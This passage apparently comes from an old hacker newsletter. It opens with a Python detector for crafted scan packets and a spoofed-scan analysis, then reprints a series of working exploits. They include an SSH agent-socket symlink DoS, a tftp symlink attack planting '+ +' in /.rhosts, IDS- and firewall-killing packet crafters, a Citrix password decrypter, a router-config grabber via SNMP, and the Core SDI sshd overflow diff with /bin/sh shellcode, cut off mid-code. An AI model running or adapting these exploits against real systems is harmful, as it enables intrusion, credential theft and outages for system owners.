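# Constructed sample: five records in the layout of the excerpt above,
# followed by three ordinary SYNs from a documentation-range address.
SAMPLE = "".join(
    f"05/20-17:06:45.06{p:04d} 192.160.13.4:31337 -> 172.16.1.101:{p}\n"
    "TCP TTL:44 TOS:0x10 ID:242\n"
    "***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400\n\n"
    for p in range(1, 6)
) + "".join(
    f"05/20-17:07:0{n}.000000 192.0.2.10:{40000 + n} -> 172.16.1.101:80\n"
    f"TCP TTL:60 TOS:0x0 ID:{5000 + n} DF\n"
    f"**S***** Seq: 0x{0x1A2B3C00 + 64000 * n:X} Ack: 0x0 Win: 0x7D78\n\n"
    for n in range(1, 4)
)

# \s+ between fields lets the same pattern match the three-line layout
# and a copy whose line breaks were flattened into spaces.
PACKET_RE = re.compile(
    r"\d\d/\d\d-\d\d:\d\d:\d\d\.\d+\s+"
    r"(?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+)\s+"
    r"TCP\s+TTL:\d+\s+TOS:0x[0-9A-Fa-f]+\s+ID:(?P<ipid>\d+)(?:\s+DF)?\s+"
    r"(?P<flags>[*12SFRPAU]{8})\s+"
    r"Seq:\s*(?P<seq>0x[0-9A-Fa-f]+)\s+Ack:\s*(?P<ack>0x[0-9A-Fa-f]+)"
)


def parse_packets(text):
    """Return one dict per TCP record found in Snort text output."""
    packets = []
    for m in PACKET_RE.finditer(text):
        packets.append({
            "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"]),
            "ipid": int(m["ipid"]),
            "flags": frozenset(m["flags"]) - {"*"},
            "seq": int(m["seq"], 16), "ack": int(m["ack"], 16),
        })
    return packets


def crafted_indicators(packets, min_packets=3):
    """Map source IP -> list of signs that its packets were hand-built."""
    by_src = defaultdict(list)
    for pkt in packets:
        by_src[pkt["src"]].append(pkt)

    report = {}
    for src, pkts in by_src.items():
        found = []
        if len(pkts) >= min_packets:
            # A real stack advances all three; require all constant so that
            # plain SYNs (Ack always 0) are not flagged on Ack alone.
            if all(len({p[k] for p in pkts}) == 1 for k in ("seq", "ack", "ipid")):
                found.append("constant Seq/Ack/IP ID")
            # One local port reused while the destination port walks a range.
            if (len({p["sport"] for p in pkts}) == 1
                    and len({p["dport"] for p in pkts}) == len(pkts)):
                found.append("fixed source port across ports")
        # FIN and RST are contradictory; FRP from the scan is one such case.
        if any({"F", "R"} <= p["flags"] for p in pkts):
            found.append("FIN+RST set together")
        if found:
            report[src] = found
    return report


if __name__ == "__main__":
    for src, signs in crafted_indicators(parse_packets(SAMPLE)).items():
        print(src, "->", ", ".join(signs))
```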
A comment from the system owner Rahul Dhesi, who has been extremely
helpful with this analysis:

"Hi, I don't see any obvious signs of a break-in on bug.rahul.net or
foxtrot.rahul.net. Also, they are running different OSs: foxtrot is
SunOS 4.1.3_U1, while bug is FreeBSD 3.4-STABLE. It seems doubtful to me
that somebody would break into two machines running different OSs at
around the same time. If somebody really broke into one of them, he
would likely attack other machines on the network running the same OS.
So I'm guessing that all packets were spoofed."

Side note, FRP packets are not entered in the state table for FW-1
firewall. Even though the packet may be accepted and logged, the packet
would not enter the FW-1 state table.

ADDENDUM
--------

If you have any comments or words of wisdom you would like to add,
please email me at Lance Spitzner. Also, I have posted the raw data
(tcpdump/snort binary format). You can download it at
http://www.enteract.com/~lspitz/scan.gz

Thanks to the following people for their help and ideas:

        Nelson Murilo
        Bill Pennington
        Aaron Campbell
        Denis Ducamp
        Simple Nomad
        K2 ADM CREW
        ... and the many others who sent their ideas

@HWA

233.0 [IND] local ssh 1.2.27 dos attack.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.hack.co.za/daem0n/ssh/socket-dos.pl

#!/usr/bin/perl
#
# vulnerable: SSH 1.2.27
#
# A vulnerability in SSH's creation of the authentication
# agent UNIX domain socket allows local users to create a
# UNIX domain socket with an arbitrary file name in the
# system.
#
# SSH has the concept of authentication proxying via the
# SSH authentication agent. It allows for a basic kind of
# Single Sign-On capability. The sshd daemon, ssh and ssh
# -agent communicate via a UNIX domain socket normally of
# the form '/tmp/ssh-/agent-socket-'.
#
# SSH follows symbolic links while creating the socket as
# root thus allowing any local users with ssh access to
# create a socket with an arbitrary filename in the
# system.
# # Notice that this will not work under all operating # systems. Some operating systems do not follow symbolic # links during bind on UNIX domain sockets. Linux 2.0.x, # Solaris 2.5.1 and IRIX 6.5.2 do not follow symbolic # links during bind(2). Linux 2.1.x does. $pid = $$; $whoami = `whoami`; chop($whoami); mkdir("/tmp/ssh-$whoami", 0700); for ($i = $pid; $i < $pid+50; $i++) { symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent"); } # www.hack.co.za [23 May]# @HWA 234.0 [IND] ascend router remote exploit by loneguard. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/ascend/tftp.sh #!/bin/sh # # tftpserv.sh - Loneguard 07/03/99 # # Buggy tftp server shipped with CascadeView B-STDX 8000/9000 # # The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000 # network devices creates a log in /tmp called tftpd_xfer_status.log. # # If /tmp/tftpd_xfer_status.log already exists as a symbolic link, # tftpd will follow it and overwrite any data it points to (it runs # as root). It is possible for an attacker to link the log file to a # file like /.rhosts to compromise elevated privileges on the device. # # It should be made clear that since this is a network device # vulnerability, the consequences of compromise could be much greater # to the network the device is on as a whole than if it were a single # regular host. rm /tmp/tftpd_xfer_status.log ln -s /.rhosts /tmp/tftpd_xfer_status.log echo KungFu > crazymonkey ( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1 echo "+ +" > /.rhosts # www.hack.co.za [23 May]# @HWA 235.0 [IND] ascend router remote dos exploit by rfp. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ rfp@wiretrip.net http://www.hack.co.za/os/routers/axent/RFProwl.c /* RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net Kills NetProwler IDS version 3.0 You need libnet installed. It's available from www.packetfactory.net. Acks to route. Only tested on RH 6.x Linux. 
To compile: gcc RFProwl.c -lnet -o RFProwl Plus, make sure your architecture is defined below: Axent NetProwler 3.0 */ #define LIBNET_LIL_ENDIAN 1 #undef LIBNET_BIG_ENDIAN 1 #include /* it's just much easier to code in the packet frags we want. :) */ char pack1[]="\x45\x00" "\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09" "\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02" "\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; char pack2[]="\x45\x00" "\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09" "\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02" "\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00"; int main(int argc, char **argv) { int sock, c; u_long src_ip, dst_ip; printf("RFProwl - rain forest puppy / wiretrip\n"); if(argc<3){ printf("Usage: RFProwl \n"); exit(EXIT_FAILURE);} dst_ip=inet_addr(argv[1]); src_ip=inet_addr(argv[2]); memcpy(pack1+16,&dst_ip,4); memcpy(pack2+16,&dst_ip,4); memcpy(pack1+12,&src_ip,4); memcpy(pack1+12,&src_ip,4); sock = open_raw_sock(IPPROTO_RAW); if (sock == -1){ perror("Socket problems: "); exit(EXIT_FAILURE);} c = write_ip(sock, pack1, 46); if (c < 46) printf("Write_ip #1 choked\n"); c = write_ip(sock, pack2, 46); if (c < 46) printf("Write_ip #2 choked\n"); printf("Packets sent\n"); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); } /* www.hack.co.za [23 May]*/ @HWA 236.0 [IND] citrix router local exploit by dug song. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/citrix/icadecrypt.c http://www.monkey.org/%7Edugsong/ /* icadecrypt.c Decrypt stored Citrix ICA passwords (in appsrv.ini). 
vulnerable Citrix MetaFrame for Unix 1.0 - Sun Solaris 8.0 - Sun Solaris 7.0 Citrix MetaFrame for Windows 2000 1.8 and previous - Microsoft Windows NT 2000 Citrix MetaFrame for Windows NT 4.0 TSE 1.8 and previous - Microsoft Windows NT Terminal Server + Microsoft Windows NT 4.0 Citrix WinFrame for Windows NT 3.5 1.8 - Microsoft Windows NT 3.5.1 Dug Song */ #include #include #include #include #include int hex_decode(char *src, u_char *dst, int outsize) { char *p, *pe; u_char *q, *qe, ch, cl; pe = src + strlen(src); qe = dst + outsize; for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) { ch = tolower(p[0]); cl = tolower(p[1]); if ((ch >= '0') && (ch <= '9')) ch -= '0'; else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10; else return (-1); if ((cl >= '0') && (cl <= '9')) cl -= '0'; else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10; else return (-1); *q++ = (ch << 4) | cl; } return (q - dst); } int ica_decrypt(u_char *pass, int len) { u_short i; u_char *p, key; if (len < 4) return (0); i = ntohs(*(u_short *)pass); if (i != len - 2) return (0); key = pass[2]; p = pass + 3; for (i -= 2; i > 0; i--) p[i] = p[i - 1] ^ p[i] ^ key; p[0] ^= (key | 'C'); i = len - 3; memmove(pass, pass + 3, i); pass[i] = '\0'; return (1); } void usage(void) { fprintf(stderr, "Usage: icadecrypt \n"); exit(1); } int main(int argc, char *argv[]) { FILE *f; u_char line[1024], pass[128]; int len; if (argc != 2 || *argv[1] == '-') usage(); if ((f = fopen(argv[1], "r")) == NULL) { perror("fopen"); exit(1); } while (fgets(line, sizeof(line), f) != NULL) { if (strncmp(line, "Password=", 9) == 0) { len = hex_decode(line + 9, pass, sizeof(pass)); if (ica_decrypt(pass, len)) printf("; icadecrypt: [%s]\n", pass); } printf("%s", line); } fclose(f); exit(0); } /* 5000. */ /* www.hack.co.za [23 May]*/ @HWA 237.0 [IND] ascend router remote dos attack by msg.net. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/axent/raptor.c /* * 10.26.1999 * Axent Raptor 6.0 'IP Options DOS' as documented in BugTraq 10.20.1999 * * Proof of Concept by MSG.Net, Inc. * * Tested on Intel/*BSD systems, your mileage may vary. No warranty. * Free to distribute as long as these comments remain intact. * * Exercises the IP options bug reported in Raptor 6.0, this bug is fixed by * an Axent official patch available at: * * ftp://ftp.raptor.com/patches/V6.0/6.02Patch/ * * * The MSG.Net Firewall Wrecking Crew * * [kadokev, l^3, strange, vn] * * Quid custodiet ipsos custodes? */ #define __FAVOR_BSD #include #include #include #include #include #include #include #include #include #include #define SRC_IP htonl(0x0a000001) /* 10.00.00.01 */ #define TCP_SZ 20 #define IP_SZ 20 #define PAYLOAD_LEN 32 #define OPTSIZE 4 #define LEN (IP_SZ + TCP_SZ + PAYLOAD_LEN + OPTSIZE) void main(int argc, char *argv[]) { int checksum(unsigned short *, int); int raw_socket(void); int write_raw(int, unsigned char *, int); unsigned long option = htonl(0x44000001); /* Timestamp, NOP, END */ unsigned char *p; int s, c; struct ip *ip; struct tcphdr *tcp; if (argc != 2) { printf("Quid custodiet ipsos custodes?\n"); printf("Usage: %s \n", argv[0]); return; } p = malloc(1500); memset(p, 0x00, 1500); if ((s = raw_socket()) < 0) return perror("socket"); ip = (struct ip *) p; ip->ip_v = 0x4; ip->ip_hl = 0x5 + (OPTSIZE / 4); ip->ip_tos = 0x32; ip->ip_len = htons(LEN); ip->ip_id = htons(0xbeef); ip->ip_off = 0x0; ip->ip_ttl = 0xff; ip->ip_p = IPPROTO_TCP; ip->ip_sum = 0; ip->ip_src.s_addr = SRC_IP; ip->ip_dst.s_addr = inet_addr(argv[1]); /* Masquerade the packet as part of a legitimate answer */ tcp = (struct tcphdr *) (p + IP_SZ + OPTSIZE); tcp->th_sport = htons(80); tcp->th_dport = 0xbeef; tcp->th_seq = 0x12345678; tcp->th_ack = 0x87654321; tcp->th_off = 5; tcp->th_flags = TH_ACK | TH_PUSH; tcp->th_win = htons(8192); tcp->th_sum = 0; /* Set the IP 
options */ memcpy((void *) (p + IP_SZ), (void *) &option, OPTSIZE); c = checksum((unsigned short *) &(ip->ip_src), 8) + checksum((unsigned short *) tcp, TCP_SZ + PAYLOAD_LEN) + ntohs(IPPROTO_TCP + TCP_SZ); while (c >> 16) c = (c & 0xffff) + (c >> 16); tcp->th_sum = ~c; printf("Sending %s -> ", inet_ntoa(ip->ip_src)); printf("%s\n", inet_ntoa(ip->ip_dst)); if (write_raw(s, p, LEN) != LEN) perror("sendto"); } int write_raw(int s, unsigned char *p, int len) { struct ip *ip = (struct ip *) p; struct tcphdr *tcp; struct sockaddr_in sin; tcp = (struct tcphdr *) (ip + ip->ip_hl * 4); memset(&sin, 0x00, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = ip->ip_dst.s_addr; sin.sin_port = tcp->th_sport; return (sendto(s, p, len, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr_in))); } int raw_socket(void) { int s, o = 1; if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) return -1; if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, (void *) &o, sizeof(o)) < 0) return (-1); return (s); } int checksum(unsigned short *c, int len) { int sum = 0; int left = len; while (left > 1) { sum += *c++; left -= 2; } if (left) sum += *c & 0xff; return (sum); } /*###EOF####*/ /* www.hack.co.za [24 May]*/ @HWA 238.0 [IND] cisco/ascend router remote exploit. posted by mixter. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/os/routers/cisco/grabrtrconf.sh #!/bin/sh # grabrtrconf: # Pull router configs via tftp for cisco's and ascends. obviously trivial to # modify this for other network hardware that supports this type of thing. # # - [type] can be one of cisco | ascend currently # - defaults to cisco # - requires cmu snmp utilities (snmpset specifically) # - use TFTPLISTEN and disable tftp from /etc/inetd.conf if you want to # launch a 'temporary' in.tftpd just to grab the file. # - 'pidof' only exists on linux that I know of which kindof makes this a # linux-only tool, unless/until I decide to stop relying on it. 
# - Set 'INT' to whatever your routable IP is. # - run as root (if you want to launch the tftp server) # # - I know this is lame... but it works (most of the time). # # by: Eric Monti 11/1997 # TFTPLISTEN="true" DIR=/tftpboot #might want to use something else WAIT=6 INT=ppp0 test "$4" = "" && echo "Usage: `basename $0` target write-community tftphost filename [type]" && exit 1 TYPE=$5 test "$5" = "" && TYPE="cisco" IPADDR=$3 test "$IPADDR" = "." && IPADDR=`/sbin/ifconfig $INT | grep inet | sed "s/\:/\ /" | awk '{print $3}'` echo $3 if [ -n $TFTPLISTEN ];then echo "tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd $DIR" > /tmp/ind.conf /usr/sbin/inetd -d /tmp/ind.conf & rm /tmp/ind.conf rm -f $DIR/$4 touch $DIR/$4 chmod 666 $DIR/$4 fi #CISCO get config test "$TYPE" = "cisco" && \ snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.9.2.1.55.$IPADDR s $4 #ASCEND get config if [ "$TYPE" = "ascend" ];then snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a $IPADDR snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s $4 snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.1.0 i 3 snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a "0.0.0.0" snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s "" fi sleep $WAIT # i got lazy and used pidof... so what. # I made pretty dots appear to make up for it! if (test `pidof in.tftpd`);then echo Receiving file: while (test "`pidof in.tftpd`");do echo -n . sleep 1 done echo echo Transfer Complete fi if [ -n $TFTPLISTEN ];then kill `cat /var/run/inetd.pid` # jeepers, i hope that wasnt the real1 fi # www.hack.co.za [23 May]# @HWA 239.0 [IND] remote ssh 1.2.27 remote overflow by Core SDI SA. 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.hack.co.za/daem0n/ssh/sshd-rsaref2.diff diff -N -c ssh-1.2.27/README.coresdi ssh-1.2.27-exploit/README.coresdi *** ssh-1.2.27/README.coresdi Wed Dec 31 21:00:00 1969 --- ssh-1.2.27-exploit/README.coresdi Tue Dec 14 19:21:10 1999 *************** *** 0 **** --- 1,32 ---- + /* + * + * Descrition: Exploit code for SSH-1.2.27 sshd with rsaref2 compiled in + * (--with-rsaref) + * + * Author: Alberto Solino + * + * Copyright (c) 1999 CORE SDI S.A., Buenos Aires, Argentina. + * All rights reserved. + * + * + * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES + * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY DIRECT, + * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES RESULTING + * FROM THE USE OR MISUSE OF THIS SOFTWARE. + * + */ + + Tested on + SSH-1.2.27 Linux RedHat 6.0 + SSh-1.2.27 OpenBSD 2.6 + + Details + Relies on offsets taken from JUMP_TO_MY_KEY that are different on + different boxes. + If it doesnt work, check inside incoming.buf for the string "BETO" + and find the proper offsets from there. + Additionally, the -f nad -t options are available, to provide + a range of addresses and try to brute force remotely the right + one. 
+ Specify the target os type with -o + Binary files ssh-1.2.27/exploit_key and ssh-1.2.27-exploit/exploit_key differ diff -N -c ssh-1.2.27/exploit_key.pub ssh-1.2.27-exploit/exploit_key.pub *** ssh-1.2.27/exploit_key.pub Wed Dec 31 21:00:00 1969 --- ssh-1.2.27-exploit/exploit_key.pub Tue Nov 30 01:14:10 1999 *************** *** 0 **** --- 1 ---- + 1024 35 126711790959034717449904354103174105464423905750911738400315407900752946071988773532672356922306687685191424606806952947660867911760697942514594956213990584856991678398353026692681430136274853402829183803383791361598788187120276305630837366787507026341329913385926890796258293060370046555624537870005279144741 root@jack Common subdirectories: ssh-1.2.27/gmp-2.0.2-ssh-2 and ssh-1.2.27-exploit/gmp-2.0.2-ssh-2 diff -N -c ssh-1.2.27/history ssh-1.2.27-exploit/history *** ssh-1.2.27/history Wed Dec 31 21:00:00 1969 --- ssh-1.2.27-exploit/history Tue Nov 16 21:41:36 1999 *************** *** 0 **** --- 1,7 ---- + Tue Nov 16 19:58:04 ART 1999 + En RSAPrivateBlock, no calcula la longitud de salida del buffer, simplemente copia + el tamanio del modulo que esta en privatekey, pero la longitud de los numeros + nunca es mayor que 128. + Tue Nov 16 21:41:15 ART 1999 + overflow en RSAPrivateDecrypt????!?!?!??!?!?! who knows!! fijarse... 
+ Common subdirectories: ssh-1.2.27/rsaref2 and ssh-1.2.27-exploit/rsaref2 diff -N -c ssh-1.2.27/ssh.c ssh-1.2.27-exploit/ssh.c *** ssh-1.2.27/ssh.c Wed May 12 08:19:28 1999 --- ssh-1.2.27-exploit/ssh.c Tue Dec 14 19:03:59 1999 *************** *** 202,208 **** #include "readconf.h" #include "userfile.h" #include "emulate.h" - #ifdef LIBWRAP #include #include --- 202,207 ---- *************** *** 212,217 **** --- 211,249 ---- int allow_severity = LOG_INFO; int deny_severity = LOG_WARNING; #endif /* LIBWRAP */ + #ifdef SSH_EXPLOIT + #define BETO_STR 0x80850f8 + unsigned long exp_offset=BETO_STR; + unsigned long exp_offset_to=BETO_STR; + unsigned char *shell_code; + unsigned long shell_code_len=0; + unsigned char linux_shell_code[]= + {0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 + ,0xeb ,0x44 ,0x5e ,0x89 ,0x76 + ,0x08 ,0x31 ,0xc0 ,0x88 ,0x46 ,0x07 ,0x89 ,0x46 + ,0x0c ,0x56 ,0xb9 ,0x00 ,0x00 ,0x00 ,0x00 ,0xbb + ,0x05 ,0x00 ,0x00 ,0x00 ,0xb0 ,0x3f ,0xcd ,0x80 + ,0xb9 ,0x01 ,0x00 ,0x00 ,0x00 ,0xbb ,0x05 ,0x00 + ,0x00 ,0x00 ,0xb0 ,0x3f ,0xcd ,0x80 ,0xb9 ,0x02 + ,0x00 ,0x00 ,0x00 ,0xbb ,0x05 ,0x00 ,0x00 ,0x00 + ,0xb0 ,0x3f ,0xcd ,0x80 ,0x5e ,0xb0 ,0x0b ,0x89 + ,0xf3 ,0x8d ,0x4e ,0x08 ,0x8d ,0x56 ,0x0c ,0xcd + ,0x80 ,0xe8 ,0xb7 ,0xff ,0xff ,0xff ,0x2f ,0x62 + ,0x69 ,0x6e ,0x2f ,0x73 ,0x68 ,0x00}; + unsigned char bsd_shell_code[]= + {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, + 0xeb, 0x45, 0x5e, 0x89, 0x76, 0x08, 0x31, 0xc0, + 0x88, 0x46, 0x07, 0x89, 0x46, 0x0c, 0x6a, 0x00, + 0x6a, 0x05, 0x51, 0xb8, 0x5a, 0x00, 0x00, 0x00, + 0xcd, 0x80, 0x6a, 0x01, 0x6a, 0x05, 0x51, 0xb8, + 0x5a, 0x00, 0x00, 0x00, 0xcd, 0x80, 0x6a, 0x02, + 0x6a, 0x05, 0x51, 0xb8, 0x5a, 0x00, 0x00, 0x00, + 0xcd, 0x80, 0x6a, 0x00, 0x8d, 0x46, 0x08, 0x50, + 0x8b, 0x46, 0x08, 0x50, 0xb8, 0x3b, 0x00, 0x00, + 0x00, 0x31, 0xc9, 0x41, 0x51, 0xcd, 0x80, 0xe8, + 0xb6, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, + 0x2f, 0x73, 0x68, 0x00}; + #endif /* Random number generator state. 
This is initialized in ssh_login, and left initialized. This is used both by the packet module and by various *************** *** 275,280 **** --- 307,322 ---- /* Prints a help message to the user. This function never returns. */ void usage(void) { + #ifdef SSH_EXPLOIT + fprintf(stderr, "ssh/rsaref2 exploit by Core SDI SA (c) 1999\n"); + fprintf(stderr, "Usage:\n\t%s [-f offset_from] [-t offset_to] -o ostype host\n",av0); + fprintf(stderr, "where:\n"); + fprintf(stderr, "\toffset_from: start offset for brute force\n"); + fprintf(stderr, "\toffset_to: end offset for brute force\n"); + fprintf(stderr, "\tostype: remote machine ostype\n"); + fprintf(stderr, " BSD : for (*BSD)\n"); + fprintf(stderr, " Linux : for Intel Linuxes\n\n"); + #else fprintf(stderr, "Usage: %s [options] host [command]\n", av0); fprintf(stderr, "Options:\n"); fprintf(stderr, " -l user Log in using this user name.\n"); *************** *** 321,326 **** --- 363,369 ---- fprintf(stderr, " -C Enable compression.\n"); fprintf(stderr, " -g Allow remote hosts to connect to local port forwardings\n"); fprintf(stderr, " -o 'option' Process the option as if it was read from a configuration file.\n"); + #endif exit(1); } *************** *** 504,510 **** --- 547,557 ---- opt = av[optind][1]; if (!opt) usage(); + #ifdef SSH_EXPLOIT + if (strchr("fto", opt)) /* options with arguments */ + #else if (strchr("eilcpLRo", opt)) /* options with arguments */ + #endif { optarg = av[optind] + 2; if (strcmp(optarg, "") == 0) *************** *** 522,527 **** --- 569,594 ---- } switch (opt) { + #ifdef SSH_EXPLOIT + case 'f': + exp_offset = strtoul(optarg,NULL,16); + break; + case 't': + exp_offset_to = strtoul(optarg,NULL,16); + break; + case 'o': + if ( !strcmp(optarg,"BSD") ) { + shell_code = bsd_shell_code; + shell_code_len = sizeof(bsd_shell_code); + } + else if ( !strcmp(optarg,"Linux") ) { + shell_code = linux_shell_code; + shell_code_len = sizeof(linux_shell_code); + } + else + usage(); + break; + #else case 'n': 
stdin_null_flag = 1; break; *************** *** 681,692 **** case 'g': options.gateway_ports = 1; break; ! default: usage(); } } ! /* Check that we got a host name. */ if (!host) usage(); --- 748,766 ---- case 'g': options.gateway_ports = 1; break; ! #endif default: usage(); } } ! #ifdef SSH_EXPLOIT ! if ( shell_code == NULL ) ! usage(); ! if ( exp_offset_to < exp_offset ) { ! fprintf(stderr,"Invalid offsets!\n"); ! usage(); ! } ! #endif /* Check that we got a host name. */ if (!host) usage(); *************** *** 793,798 **** --- 867,876 ---- rhosts_authentication is true. Note that the random_state is not yet used by this call, although a pointer to it is stored, and thus it need not be initialized. */ + #ifdef SSH_EXPLOIT + do + { + #endif ok = ssh_connect(host, options.port, options.connection_attempts, !use_privileged_port, original_real_uid, options.proxy_command, &random_state); *************** *** 846,857 **** original_real_uid); options.user_hostfile = tilde_expand_filename(options.user_hostfile, original_real_uid); ! /* Log into the remote system. This never returns if the login fails. Note: this initializes the random state, and leaves it initialized. */ ssh_login(&random_state, host_private_key_loaded, &host_private_key, host, &options, original_real_uid); ! /* We no longer need the host private key. Clear it now. */ if (host_private_key_loaded) rsa_clear_private_key(&host_private_key); --- 924,941 ---- original_real_uid); options.user_hostfile = tilde_expand_filename(options.user_hostfile, original_real_uid); ! #ifdef SSH_EXPLOIT ! fprintf(stdout,"Tryin'... 0x%x\n",exp_offset); ! #endif /* Log into the remote system. This never returns if the login fails. Note: this initializes the random state, and leaves it initialized. */ ssh_login(&random_state, host_private_key_loaded, &host_private_key, host, &options, original_real_uid); ! #ifdef SSH_EXPLOIT ! exp_offset++; ! } while (exp_offset<=exp_offset_to); ! fprintf(stderr,"Didn't work ;( \n"); ! 
#endif /* We no longer need the host private key. Clear it now. */ if (host_private_key_loaded) rsa_clear_private_key(&host_private_key); diff -N -c ssh-1.2.27/sshconnect.c ssh-1.2.27-exploit/sshconnect.c *** ssh-1.2.27/sshconnect.c Wed May 12 08:19:29 1999 --- ssh-1.2.27-exploit/sshconnect.c Thu Dec 9 17:09:39 1999 *************** *** 214,220 **** #include "mpaux.h" #include "userfile.h" #include "emulate.h" - #ifdef KERBEROS #ifdef KRB5 #include --- 214,219 ---- *************** *** 1271,1276 **** --- 1270,1280 ---- const char *orighost, Options *options, uid_t original_real_uid) { + #ifdef SSH_EXPLOIT + extern unsigned long exp_offset; + extern unsigned char *shell_code; + extern unsigned long shell_code_len; + #endif int i, type, len, f; char buf[1024], seedbuf[16]; char *password; *************** *** 1278,1283 **** --- 1282,1298 ---- MP_INT key; RSAPublicKey host_key; RSAPublicKey public_key; + #ifdef SSH_EXPLOIT + MP_INT fakekey; + int retval; + unsigned char first; + struct sockaddr_in sin; + int sin_len=sizeof(struct sockaddr_in); + RSAPrivateKey myfakeKey; + RSAPrivateKey myPrivateKey; + char private_key_filename[]="exploit_key"; + fd_set rfds; + #endif unsigned char session_key[SSH_SESSION_KEY_LENGTH]; const char *server_user, *local_user; char *cp, *host; *************** *** 1501,1506 **** --- 1516,1522 ---- /* Generate an encryption key for the session. The key is a 256 bit random number, interpreted as a 32-byte key, with the least significant 8 bits being the first byte of the key. */ + for (i = 0; i < SSH_SESSION_KEY_LENGTH; i++) session_key[i] = random_get_byte(state); *************** *** 1519,1532 **** else mpz_add_ui(&key, &key, session_key[i]); } ! /* Encrypt the integer using the public key and host key of the server (key with smaller modulus first). */ if (mpz_cmp(&public_key.n, &host_key.n) < 0) { /* Public key has smaller modulus. 
*/ assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED); - rsa_public_encrypt(&key, &key, &public_key, state); rsa_public_encrypt(&key, &key, &host_key, state); } --- 1535,1552 ---- else mpz_add_ui(&key, &key, session_key[i]); } ! #ifdef SSH_EXPLOIT ! if ( load_private_key(getuid(),private_key_filename,"",&myPrivateKey,NULL)==0) { ! fprintf(stderr,"Cannot locate private key %s\n",private_key_filename); ! exit(1); ! } ! #endif /* Encrypt the integer using the public key and host key of the server (key with smaller modulus first). */ if (mpz_cmp(&public_key.n, &host_key.n) < 0) { /* Public key has smaller modulus. */ assert(host_key.bits >= public_key.bits + SSH_KEY_BITS_RESERVED); rsa_public_encrypt(&key, &key, &public_key, state); rsa_public_encrypt(&key, &key, &host_key, state); } *************** *** 1534,1540 **** { /* Host key has smaller modulus (or they are equal). */ assert(public_key.bits >= host_key.bits + SSH_KEY_BITS_RESERVED); - rsa_public_encrypt(&key, &key, &host_key, state); rsa_public_encrypt(&key, &key, &public_key, state); } --- 1554,1559 ---- *************** *** 1564,1569 **** --- 1583,1637 ---- for (i = 0; i < 8; i++) packet_put_char(check_bytes[i]); + #ifdef SSH_EXPLOIT + for ( i = 0 ; i < 16; i++ ) { + mpz_mul_2exp(&key, &key, 8); + mpz_add_ui(&key, &key, i+1); + } + /* Aca seto el lugar donde va a estar la clave nueva cambiada*/ + for ( i = 0; i < 4 ; i++ ) { + mpz_mul_2exp(&key,&key,8); + mpz_add_ui(&key,&key, ((exp_offset+9) >> (i*8) & 0xff)); + } + + /* Con esto fuerzo a que el ciphertext sea mas chico que el modulo*/ + key._mp_d[31]=0; + key._mp_d[32]=0; + key._mp_d[3]=htonl(exp_offset+0x5b); + /* Ret address a mi codigo */ + //key._mp_d[3]=0x51510808; // JUMP_TO_MY_KEY+87 dado vuelta + /* + No se porque mierda ahora hay que invertilo... 
